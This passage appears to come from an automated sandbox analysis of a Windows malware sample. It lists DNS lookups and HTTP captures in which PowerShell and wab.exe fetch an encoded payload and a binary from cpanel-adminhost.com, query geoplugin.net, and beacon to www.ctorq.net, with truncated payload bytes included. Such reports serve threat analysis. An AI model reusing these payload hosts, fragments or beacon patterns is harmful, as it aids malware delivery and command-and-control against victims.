                                                            Aug 28, 2024 14:04:49.899410963 CEST1.1.1.1192.168.2.40xaa21No error (0)ghs.googlehosted.com142.250.186.147A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:05:04.176655054 CEST1.1.1.1192.168.2.40x2b2eNo error (0)www.shabygreen.top203.161.41.205A (IP address)IN (0x0001)false
                                                            Aug 28, 2024 14:05:18.439898968 CEST1.1.1.1192.168.2.40x4b57No error (0)www.kera333.orgkera333.orgCNAME (Canonical name)IN (0x0001)false
                                                            Aug 28, 2024 14:05:18.439898968 CEST1.1.1.1192.168.2.40x4b57No error (0)kera333.org64.46.102.70A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • avocaldoperu.com
                                                            • geoplugin.net
                                                            • cpanel-adminhost.com
                                                            • www.ctorq.net
                                                            • www.vendasnaweb1.com
                                                            • www.411divorce.com
                                                            • www.gtprivatewealth.com
                                                            • www.katasoo.com
                                                            • www.martinminorgroup.com
                                                            • www.atlpicsstudios.com
                                                            • www.openhandedvision.com
                                                            • www.shabygreen.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449741178.237.33.50807328C:\Program Files (x86)\Windows Mail\wab.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:01:56.052421093 CEST71OUTGET /json.gp HTTP/1.1
                                                            Host: geoplugin.net
                                                            Cache-Control: no-cache
                                                            Aug 28, 2024 14:01:56.654249907 CEST1170INHTTP/1.1 200 OK
                                                            date: Wed, 28 Aug 2024 12:01:56 GMT
                                                            server: Apache
                                                            content-length: 962
                                                            content-type: application/json; charset=utf-8
                                                            cache-control: public, max-age=300
                                                            access-control-allow-origin: *
                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                            Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449742193.25.216.165805288C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:02:00.433391094 CEST177OUTGET /Stevns179.mix HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: cpanel-adminhost.com
                                                            Connection: Keep-Alive
                                                            Aug 28, 2024 14:02:01.145034075 CEST1236INHTTP/1.1 200 OK
                                                            Date: Wed, 28 Aug 2024 12:02:01 GMT
                                                            Server: Apache/2.2.15 (CentOS)
                                                            Last-Modified: Mon, 26 Aug 2024 05:10:49 GMT
                                                            ETag: "80bba-70df0-6208f25f0b0d4"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 462320
                                                            Connection: close
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Data Raw: 36 77 4a 64 63 4f 73 43 39 46 36 37 45 6a 30 63 41 48 45 42 6d 2b 73 43 4c 54 59 44 58 43 51 45 36 77 49 30 36 2b 73 43 30 43 53 35 75 53 31 49 57 48 45 42 6d 2b 73 43 69 61 69 42 36 55 36 47 38 6d 4a 78 41 5a 76 72 41 74 47 78 67 63 47 56 57 4b 6f 4b 63 51 47 62 63 51 47 62 36 77 4a 43 70 65 73 43 74 58 32 36 45 42 43 65 42 33 45 42 6d 33 45 42 6d 2b 73 43 64 73 70 78 41 5a 73 78 79 6e 45 42 6d 33 45 42 6d 34 6b 55 43 33 45 42 6d 2b 73 43 75 63 6e 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 76 69 65 42 2b 61 37 46 61 41 4a 38 7a 58 45 42 6d 33 45 42 6d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 33 45 42 6d 2b 73 43 75 35 75 42 77 35 74 37 58 67 48 72 41 74 4c 4e 63 51 47 62 75 73 31 68 51 37 37 72 41 72 62 62 36 77 4c 4f 58 34 48 79 5a 68 37 66 6d 48 45 42 6d 2b 73 43 33 4f 36 42 36 71 74 2f 6e 43 62 72 41 73 59 6a 63 51 47 62 36 77 4b 73 67 6e 45 42 6d 33 45 42 6d 2b 73 43 78 4d 53 4c 44 42 44 72 41 6d 33 50 36 77 49 68 2b 59 6b 4d 45 2b 73 43 75 48 46 78 41 5a 74 43 36 77 [TRUNCATED]
                                                            Data Ascii: 6wJdcOsC9F67Ej0cAHEBm+sCLTYDXCQE6wI06+sC0CS5uS1IWHEBm+sCiaiB6U6G8mJxAZvrAtGxgcGVWKoKcQGbcQGb6wJCpesCtX26EBCeB3EBm3EBm+sCdspxAZsxynEBm3EBm4kUC3EBm+sCucnR4nEBm3EBm4PBBHEBm+sCvieB+a7FaAJ8zXEBm3EBm4tEJARxAZtxAZuJw3EBm+sCu5uBw5t7XgHrAtLNcQGbus1hQ77rArbb6wLOX4HyZh7fmHEBm+sC3O6B6qt/nCbrAsYjcQGb6wKsgnEBm3EBm+sCxMSLDBDrAm3P6wIh+YkME+sCuHFxAZtC6wJEXOsCFF+B+njhBAB103EBm+sCAOyJXCQM6wJ4+OsCyd2B7QADAADrAoTkcQGbi1QkCHEBm3EBm4t8JARxAZvrAqHvietxAZtxAZuBw5wAAADrAnsv6wJBfVNxAZtxAZtqQHEBm3EBm4nrcQGb6wKwiMeDAAEAAAAQiAJxAZvrApapgcMAAQAAcQGb6wLrd1PrAkDA6wI0dInrcQGb6wL7cIm7BAEAAHEBm+sCfSqBwwQBAABxAZtxAZtTcQGb6wJYYGr/cQGb6wLBJIPCBXEBm3EBmzH26wKmUusCh7wxyXEBm+sCXneLGnEBm3EBm0FxAZtxAZs5HAp19HEBm+sClsxG6wLcBHEBm4B8Cvu4dd7rAuPJ6wKFE4tECvzrAmtc6wLGFSnwcQGbcQGb/9JxAZvrAnP6unjhBADrAr0v6wLNnDHAcQGb6wKKOot8JAxxAZvrAqdcgTQH8ZYgkXEBm+sCH46DwARxAZvrAkOHOdB15OsC76/rAhR6ifvrAoUbcQGb/9frAvlF6wK1QnVjRqgoH8VWtCI80vBjoeRFYO+zRBdVJXPkaTtw45T5DPzK3Q7blOQLw9dXLGJv+XhzoGhtL7OBZmehYISE3BdwaEpFF
                                                            Aug 28, 2024 14:02:01.145047903 CEST224INData Raw: 62 43 68 59 50 39 44 44 43 4a 77 5a 39 42 47 74 6c 4c 6e 31 66 79 57 4f 4d 4e 4e 35 55 5a 6d 4d 71 35 4b 45 49 57 62 49 49 36 70 41 37 6b 51 68 5a 73 67 36 72 58 42 37 42 43 31 6d 79 41 56 51 42 66 35 39 77 5a 56 52 73 30 32 45 30 6d 54 38 5a 61
                                                            Data Ascii: bChYP9DDCJwZ9BGtlLn1fyWOMNN5UZmMq5KEIWbII6pA7kQhZsg6rXB7BC1myAVQBf59wZVRs02E0mT8Za5SwytoTyYlCCRe8fxhaMsvpHxlqFr+26D5/4ZskH1lnoQRP8ikfHM0ualF43485Ygw4rNUxQ4198cmJQgkYRh1ld416kEFJcgkUtHwF+YF9K1HL3lqR3wGVpwZHrX2eSkb3B8F9s8SKVKy
                                                            Aug 28, 2024 14:02:01.145060062 CEST1236INData Raw: 45 65 72 42 42 53 58 49 4a 48 2b 45 33 68 75 44 6d 6d 67 61 4b 51 53 36 66 63 47 56 2b 2f 72 63 4f 74 6f 65 68 4b 57 49 4a 35 31 2f 6e 4b 54 38 52 2b 6c 36 66 43 57 49 42 55 6f 45 2b 41 59 62 4e 6f 68 6b 66 48 77 70 55 42 78 62 30 48 43 47 63 66
                                                            Data Ascii: EerBBSXIJH+E3huDmmgaKQS6fcGV+/rcOtoehKWIJ51/nKT8R+l6fCWIBUoE+AYbNohkfHwpUBxb0HCGcf4lfEfZdVw61RokpYgnnxy/5Hxrvl4/A8kkXFsTh508iGR8fDXV3Ya11MakCikmb9Ka+wT8HnsNCSReMs8FSEu83OCkUaoO6OaQncyRhQio7DwNkukS9xWa6OPEtwRDYGr3O0sPHNeSKBr6n6NB/WWHZ9KDBUYtL6j
                                                            Aug 28, 2024 14:02:01.145066023 CEST1236INData Raw: 79 57 33 66 62 54 74 7a 61 50 71 53 79 55 59 70 59 65 6a 4d 67 64 50 4b 51 58 69 79 74 7a 4e 52 4d 78 6d 6e 35 52 62 78 39 49 56 4d 38 39 32 4c 37 38 2b 50 72 74 77 61 49 65 52 38 5a 59 76 48 34 56 61 4a 4a 47 76 7a 71 76 63 36 63 57 62 58 7a 4d
                                                            Data Ascii: yW3fbTtzaPqSyUYpYejMgdPKQXiytzNRMxmn5Rbx9IVM892L78+PrtwaIeR8ZYvH4VaJJGvzqvc6cWbXzMpVhAyyMWWHhfTbcWvMBAyfOCQex8771UJVkryYaH2wSGO9ZEiYoUi0HCNYHhYVjazWt3XUgvBA6rhcVP4aVC/CJP9GehpaqosPerxm8i9YpIgGGQyIZHxH+LDegOEkPGWcCnUV8svxDq+6BiTBm66ORVqlbBjlGEc
                                                            Aug 28, 2024 14:02:01.145078897 CEST1236INData Raw: 4a 48 78 6c 69 44 31 4a 4c 6e 68 4e 52 76 73 74 4d 64 63 44 7a 68 55 4f 33 65 30 4e 7a 4a 32 77 43 33 69 58 4a 77 77 42 75 78 31 6d 49 75 4a 6d 33 7a 78 46 51 39 6f 66 68 4f 6b 6b 66 47 57 64 79 37 51 56 33 4a 58 63 46 45 6e 47 75 6e 46 6f 57 62
                                                            Data Ascii: JHxliD1JLnhNRvstMdcDzhUO3e0NzJ2wC3iXJwwBux1mIuJm3zxFQ9ofhOkkfGWdy7QV3JXcFEnGunFoWbZ20uIogqpcvitvRUw6j7M3gEzyeKDr4tl4rvjFz1wnruEiUKw8GmN8P63FLxyLbd+6qRSqsaY5fGWIKy19NzA/humWfWWeM6hLmnNWZYViNrPIqRZhFsr9Dsi57YfKO8dGwxiWIaVrev09ekev1qVN/hkXUAR+pf3
                                                            Aug 28, 2024 14:02:01.145095110 CEST1236INData Raw: 33 53 54 38 5a 59 76 56 73 44 47 49 4a 48 78 6c 69 43 52 38 5a 59 67 6b 62 33 4e 54 67 66 44 46 43 44 2b 54 78 4e 6a 6b 66 49 66 34 38 4b 6a 4c 45 6f 64 77 48 4f 68 59 37 45 47 66 75 5a 77 5a 41 71 4d 6e 67 52 77 44 58 68 32 4b 59 46 73 38 4b 56
                                                            Data Ascii: 3ST8ZYvVsDGIJHxliCR8ZYgkb3NTgfDFCD+TxNjkfIf48KjLEodwHOhY7EGfuZwZAqMngRwDXh2KYFs8KVij4TdrFiKSEXJpJzu0XZb9eMqF/pfED09lWkepQPB/NIcRKOoRZ+hKQbkV7fJaHhpqx29xfOWIB501iGR8cWbCBfDgRACPtS3bRfTbRJdbRAajKQpgR8TCa9Qv1a+hKWjXczc4ojdYDKDiORTypCID1niBXW7PWYd
                                                            Aug 28, 2024 14:02:01.145109892 CEST1236INData Raw: 32 7a 4e 2b 57 6b 38 6a 6a 41 6a 4d 72 59 52 63 63 59 35 71 63 46 2b 39 50 64 30 52 58 72 33 63 47 6d 4e 41 4b 70 61 2b 52 4b 4b 6b 68 4b 2f 49 75 77 67 35 76 59 7a 4d 74 7a 50 76 4b 47 32 45 4f 39 52 7a 37 48 41 2f 31 30 2b 5a 75 69 57 58 71 53
                                                            Data Ascii: 2zN+Wk8jjAjMrYRccY5qcF+9Pd0RXr3cGmNAKpa+RKKkhK/Iuwg5vYzMtzPvKG2EO9Rz7HA/10+ZuiWXqSGMfGhRfZm1ErVoBO9daAvApDufKFgSbNeVXBnJRZM/qFgryH2cXB/fqX4MKmQ0N5/z1wj0DGbAmo1gvmzPrYWyRSPaqwF7GVoEl7CBmAGLHn54p5PhXgLK5Pxlpt7UUAxEAL3SG6VWl0b6Ek76k+e5igenxbU9iwb
                                                            Aug 28, 2024 14:02:01.145123959 CEST1236INData Raw: 6b 61 6b 71 5a 74 51 57 65 4f 64 4d 69 4f 38 7a 33 38 72 33 72 36 4f 49 52 74 38 4c 56 6f 36 37 42 2b 64 4b 2b 39 63 50 65 59 44 63 73 4b 64 68 6b 34 33 2b 54 56 65 41 48 72 44 2f 6c 45 51 55 76 47 57 49 4a 48 78 6c 69 43 52 38 5a 5a 55 31 45 64
                                                            Data Ascii: kakqZtQWeOdMiO8z38r3r6OIRt8LVo67B+dK+9cPeYDcsKdhk43+TVeAHrD/lEQUvGWIJHxliCR8ZZU1Ed06nR4uJUPGJD9wBo0IK/BlLUaZJIikfH+tlV0L3EovyW+73BnEKLcUKFgnV6TKXin5iXcfUCWItf60oI7R9Hq04hmn3EGKPhN3eTKefL0qDl+6/DkIXcDB98lcSN45aj+LifC23MqTrf8AHBl1nqIgqF6uF+FFKAK
                                                            Aug 28, 2024 14:02:01.145136118 CEST1236INData Raw: 71 6b 4c 32 6a 6f 54 31 6a 6f 53 57 79 2f 56 75 4f 4f 48 35 43 77 6f 31 2b 69 70 38 6f 50 43 74 55 47 52 63 55 69 43 4a 38 35 36 69 54 41 33 66 6c 32 61 32 6d 68 59 61 32 75 66 4a 32 30 39 65 2f 2b 65 36 38 35 72 42 31 78 6f 77 44 49 48 52 70 6e
                                                            Data Ascii: qkL2joT1joSWy/VuOOH5Cwo1+ip8oPCtUGRcUiCJ856iTA3fl2a2mhYa2ufJ209e/+e685rB1xowDIHRpn4a6XF6WODor8ZT9N4HVQGJhXkqRkNgZXxfvge9ZYvkAPPIJHxliCR8ZYgkZdaG69P42fVSIGypFBRb8k0yJPDxSvBAVs0qgLIehlk/DbOx0+Fta3xF9ZU/htjEAe1nFs4F9YL+e2qGMcxPJPy3S48aJ/e7IbzST3+
                                                            Aug 28, 2024 14:02:01.145149946 CEST1236INData Raw: 38 79 69 70 79 68 58 5a 69 47 30 6f 32 2f 65 6d 61 78 4d 52 35 49 67 7a 36 6b 53 34 4d 71 68 4c 70 44 53 6d 62 49 4e 2f 2f 59 38 33 4c 79 70 67 35 75 77 33 4e 42 6f 6b 2f 63 66 49 46 34 61 54 76 68 6f 30 77 65 38 50 76 55 6a 63 75 62 34 6c 4e 2b
                                                            Data Ascii: 8yipyhXZiG0o2/emaxMR5Igz6kS4MqhLpDSmbIN//Y83Lypg5uw3NBok/cfIF4aTvho0we8PvUjcub4lN+JlqdojPu0FrIMZRbrGM6pVngjIZPxlkaeNqAgkfGWIJHxliCRk5Szs5dsh7fbuhgf379s75InIfZtAn74lp7ENe6raYDQhXBn6a3sLx0W1GunKDlrjqqhZ0FtbVhwYHa6/JyhZ6iaDipweMRV4dKpjwoO3SJA3xlu
                                                            Aug 28, 2024 14:02:01.150640965 CEST1236INData Raw: 70 73 48 4f 65 66 4e 6f 65 79 4e 73 43 36 52 38 5a 6d 76 62 56 75 57 49 4d 74 50 65 55 77 2f 52 68 66 57 73 2f 38 46 51 42 41 33 36 77 49 50 74 4a 6b 67 67 6e 69 57 49 4a 48 78 6c 69 43 52 38 5a 59 67 34 6c 31 5a 4f 75 57 45 47 56 68 32 49 36 4f
                                                            Data Ascii: psHOefNoeyNsC6R8ZmvbVuWIMtPeUw/RhfWs/8FQBA36wIPtJkggniWIJHxliCR8ZYg4l1ZOuWEGVh2I6OY8WfuB38iu2CdFRfmJ4uyw8BIi8hpqRfJvxd0DRAYeSCH2sC8GBefLgyXr/Dm7XRP3fwYESttBLHgG+sdZTDTZh4qMAkFlzY1SOx9ELDJsi6LWpRhnajw11Ctvn4VKM92XeY6NIMVvnVncHlyjH7nyFdLXz8tyR+U


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.449744193.25.216.165801244C:\Program Files (x86)\Windows Mail\wab.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:02:32.464818954 CEST182OUTGET /wWdnBiepyw166.bin HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: cpanel-adminhost.com
                                                            Cache-Control: no-cache
                                                            Aug 28, 2024 14:02:33.150626898 CEST1236INHTTP/1.1 200 OK
                                                            Date: Wed, 28 Aug 2024 12:02:33 GMT
                                                            Server: Apache/2.2.15 (CentOS)
                                                            Last-Modified: Mon, 26 Aug 2024 05:08:20 GMT
                                                            ETag: "80bb9-42840-6208f1d1a701c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 272448
                                                            Connection: close
                                                            Content-Type: application/octet-stream
                                                            Data Raw: 0e d8 b8 8b fa 88 2b 79 29 e6 d3 53 cd 3e 16 fe 7e dd 89 a5 6f 6a ad 4d d6 ed 12 34 74 16 d6 0e e4 6a c0 2e cc ec 46 ac 33 15 bc 8f 15 6e c0 11 bc ec 30 88 3c e1 57 d5 f9 88 53 48 81 47 54 80 f3 e5 ea 8f 7f 1e 47 f2 c9 06 76 9a fe f9 02 88 65 ed 91 27 31 0a 50 46 05 17 5d c1 80 77 a7 f0 86 f5 0a b9 b7 e3 79 92 1f 47 9d 45 80 cb 74 df e1 dd dc 42 8b 27 0d 27 33 fa e3 ed 08 26 e5 70 e8 a1 88 d9 42 4d 7e e3 94 d6 bc b4 2b 65 17 4f a4 0d 20 4e d5 94 2c 6c 44 e2 21 44 bc 92 ba 27 18 98 b8 fe e2 55 4c 2a f3 14 b1 ed c8 59 d4 21 0d 9e 4c c4 c5 ef 55 a2 09 d3 bc e6 70 5f 45 da 4f 7f 88 6a 6f 4b 9a bb d7 71 dc c8 ae 59 a2 fd ff a8 c6 62 dc 99 48 74 48 e3 9e 02 cb 35 91 a1 2b f9 30 a4 66 0a c0 42 a5 39 fe fb ec 9a 66 57 5a 28 ac b2 57 73 a8 f2 92 66 17 f2 ff 8a 7e 29 44 56 94 b4 1e 90 39 e0 7b 81 48 54 75 15 e7 66 1e 47 ab 2d 39 b0 2c cc ba 3b 5f 15 47 7c d4 d6 ff b0 54 78 d7 5a c4 07 19 82 f2 fc df 6b 0d aa f1 96 de da 6b a8 8f 2d 0a fa 70 62 b4 27 19 f5 dc cd 36 0d c9 d5 9d 52 5f 27 ef 9a e9 64 e5 79 c8 86 [TRUNCATED]
                                                            Data Ascii: +y)S>~ojM4tj.F3n0<WSHGTGve'1PF]wyGEtB''3&pBM~+eO N,lD!D'UL*Y!LUp_EOjoKqYbHtH5+0fB9fWZ(Wsf~)DV9{HTufG-9,;_G|TxZkk-pb'6R_'dy2_^f4Ptk HkO<<#i"fy>rT8+tp}coDLy&9<s'YmHPZ&rBo'`x"g#13!XLt15OXn0P%A$]_Jd[4ekjTt8,-:q$q&2M+#3-n|0my64l~JYOQU+sna?i#G)WXN;;58hcmNZck/Z a+&/40-s$X~PqTag,D-bhCw!9p)\:"p!sWR#%{b<[A;0F}X@A&pp6drSM&4H9/}42VoxgN&Bq1-ZyV0*(0gpK;tl$>-rZDYd:MR!A^[(V<+UD
                                                            Aug 28, 2024 14:02:33.150649071 CEST1236INData Raw: 83 38 ac ef cc 9d 9d 7f fd 8e dd 00 70 ab f2 fb c7 7c ff b8 a3 df b8 52 2c 85 d4 ec 55 cd 31 6f 73 d6 e8 96 24 2d c3 9a 1a 7e 60 0a 90 f0 b3 0f f6 f9 fc 64 13 76 fe fd fe 5d de df 15 92 cb 10 d2 7e 47 e3 15 5a 77 23 fb a7 8f 6b 5d 3a 93 a5 0e 93
                                                            Data Ascii: 8p|R,U1os$-~`dv]~GZw#k]:KGub.!R(ExpE\[C]g$0\z^JoC-=G^rr'2-U>ayGEtB''3&p2Bw.nD
                                                            Aug 28, 2024 14:02:33.150659084 CEST1236INData Raw: c9 5e f5 72 f7 72 ca 0b a5 d1 1a 27 32 cb d3 86 2d 14 55 3e 61 e7 a7 f0 86 f5 0a b9 b7 e3 79 92 1f 47 9d 45 80 cb 74 df e1 dd dc 42 8b 27 0d 27 33 fa e3 ed b0 26 e5 70 e6 be 32 d7 42 f9 77 2e b5 6e bd f8 e6 44 43 27 cd 7e 00 3e a7 fb 4b 1e 25 8f
                                                            Data Ascii: ^rr'2-U>ayGEtB''3&p2Bw.nDC'~>K%'Hl'9D}`(X-p_E6~R+H;9n/RE4UR1_WZjPZ(Ws#)aS99{HTgF-9(;_G|?TxJkMk-p
                                                            Aug 28, 2024 14:02:33.150670052 CEST672INData Raw: 73 a8 f2 c2 23 17 f2 b3 8b 7f 29 61 53 39 ed 1e 90 39 e0 7b 81 48 54 95 15 e5 67 15 46 a0 2d 39 a6 28 cc ba 3b 5f 15 47 7c d4 d6 3f a4 54 78 d7 4a c4 07 19 b2 f6 fc df 6b 4d aa f1 86 de da 6b aa 8f 2d 0c fa 70 62 b4 27 19 f5 da cd 36 0d c9 d5 9d
                                                            Data Ascii: s#)aS99{HTgF-9(;_G|?TxJkMk-pb'6R_fy2]^&4@tk HkO,<#i"fy>rT8+tp}coDLy&9<s'YmHPZ&rBo'`x"g#13!XLt15
                                                            Aug 28, 2024 14:02:33.150681019 CEST1236INData Raw: 6c a5 24 1c ae 3e 91 2d f0 9c a6 04 a5 72 0a 99 5a bb 44 b7 59 64 3a 4d 8c 98 52 21 d9 fd 41 94 f3 5e 5b 28 56 3c 2b b3 b0 14 55 44 f9 83 38 ac ef cc 9d 9d 7f fd db 56 ec 23 fd a5 42 9b 6a ff b8 90 29 07 a3 64 85 d4 57 3a 94 31 6f 98 d1 65 32 00
                                                            Data Ascii: l$>-rZDYd:MR!A^[(V<+UD8V#Bj)dW:1oe2-QSD72~GpBdU.2p~,.BF gu&7Y!*s0|=%Ux_-AE3TYLC2/qAd>$>>@U><
                                                            Aug 28, 2024 14:02:33.150691986 CEST1236INData Raw: a6 c3 e3 7a 8f 58 81 00 30 52 a6 7a ff 89 68 11 20 d0 27 f2 51 9a 6b d6 b5 c8 d6 51 f1 bb 17 ac d1 8f f9 a6 d1 3f 53 7b de 97 1e 14 a4 9e 36 31 71 f7 72 47 8e 95 2d e5 d8 58 cb 83 41 a8 38 a9 c1 9e e7 a7 f0 86 1d cd a3 b7 e3 fa 56 13 74 54 76 52
                                                            Data Ascii: zX0Rzh 'QkQ?S{61qrG-XA8VtTvRB!#ZB$Wau<A*g9[@AfH%x",Cq}+d*`x%B-P~"gglfp{n}x-:XPWCZ(WsJV##4nkgA0Hj
                                                            Aug 28, 2024 14:02:33.150702000 CEST1236INData Raw: 2b fe a4 38 69 4c 28 83 41 2a 6e 91 e6 f9 6c 3f f9 ef 9e db 00 be 7d 90 f0 b7 84 54 98 e7 ab f1 f4 99 16 50 fa 3b 74 a5 19 a9 57 d8 40 73 a8 8e 1f ae 92 2e 4f 74 80 41 d1 fd 4a f3 4e 78 c5 e0 7b 81 cb 90 9d aa 8a 3e 15 46 2d 49 1d a6 90 79 3b 75
                                                            Data Ascii: +8iL(A*nl?}TP;tW@s.OtAJNx{>F-Iy;uD.^I>r9s4#jwKH?5=qG_h^6]^&14@(8h\c}xK_o*We`6>T0 6aO_6#Rt.v*
                                                            Aug 28, 2024 14:02:33.150715113 CEST1236INData Raw: a5 db 5a e0 25 7a 94 7b 03 14 52 96 07 a2 60 99 22 14 39 4f c6 66 93 80 ec f1 40 2b 74 32 0a ed a3 70 01 eb 7d 63 8c e2 f1 b0 bd 8e 43 35 5b 6e b9 c1 2f f5 8a 3e db 60 e2 4c 4b 88 d1 5f 08 5d 58 26 72 6a e6 e7 1c f1 c3 95 e4 7a 47 e5 a3 c6 83 c9
                                                            Data Ascii: Z%z{R`"9Of@+t2p}cC5[n/>`LK_]X&rjzG`^1Ob$IJX`Y,'cOe\pG-:^]da&a%yhVz$h,fBIrQ$q[/w#."P#LvwML:54diYu"DjL
                                                            Aug 28, 2024 14:02:33.150727987 CEST896INData Raw: b5 ad 61 51 50 1f 6f bf 38 37 1d 5a cd 4b ee 18 72 2e 7a 29 e5 8e f1 74 e4 c9 9f 8f 94 55 68 cf 5a 6f 0f 41 d6 67 33 14 cd c7 d6 10 03 59 4c 63 6e 68 c3 81 28 0a 54 12 dc 3a 14 af a4 16 0b 99 35 c8 00 b7 6e 8f 85 da 5b 54 fa e4 ff a6 6d 5f b7 ee
                                                            Data Ascii: aQPo87ZKr.z)tUhZoAg3YLcnh(T:5n[Tm_Ge:)WXc;;mQ8XA.@["/Z<we_!/Vn6d5X^[ rO6|2cci*2a3OWtCc,:=s-BuCP`
                                                            Aug 28, 2024 14:02:33.150738001 CEST1236INData Raw: 82 3d 3b df 59 c7 5f 59 26 9a b7 de 79 74 63 57 ad dc a3 26 3b fa b5 72 d3 66 69 b1 51 91 7e a9 f9 84 e7 ee 0d 87 17 f2 74 7b 0f b2 61 30 86 8c 53 94 5e fa c3 77 97 e8 b7 87 b9 1e 85 09 93 39 97 33 02 7d 70 24 45 eb b6 3f 98 e2 4c 1b ae 22 ad 38
                                                            Data Ascii: =;Y_Y&ytcW&;rfiQ~t{a0S^w93}p$E?L"8!$3C_UADB$pxe8HP%8q0NE>7~7pe,0#bf9(H=<;N)mLQ;jq&8]S
                                                            Aug 28, 2024 14:02:33.155635118 CEST1236INData Raw: b9 58 f5 94 1a af 37 c4 78 ec 4a 2e 7a 2a e5 8e f1 74 e4 c9 9f 8f 92 4d b7 03 9a 35 84 a4 f7 06 47 19 fd f3 1e 9a fd a6 b0 64 7d 59 0d cb 7c cd 05 d4 99 56 2b 17 d9 14 0b 96 33 b7 0d e8 30 5f 49 59 6a fa 11 7c 2a 5e 84 0a 77 14 d1 e2 df e2 af c1
                                                            Data Ascii: X7xJ.z*tM5Gd}Y|V+30_IYj|*^w5ChcmZ(l$U6$frcQ+'C_xuoy!>h$XOj0Tayxj0\T%lzp*\zo=os<mtK5h\3


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.4497453.33.130.19080792C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            TimestampBytes transferredDirectionData
                                                            Aug 28, 2024 14:03:08.492166042 CEST509OUTGET /wl3e/?8le=9XPp_0_hUrF45X&4NZpb=u9FRs1l/3N7WVHEtnJgJBUEyIl9loYtb/3fG9DNnv3HsbAs5xmFcUO6EM9RRI1jF/q0HVxbcL2MkMMmvcW5YUJkmw7Lrsqc/ATJs0+pJV6RdOfO8AGIDWzk= HTTP/1.1
                                                            Host: www.ctorq.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:03:08.969852924 CEST400INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 28 Aug 2024 12:03:08 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 260
                                                            Connection: close
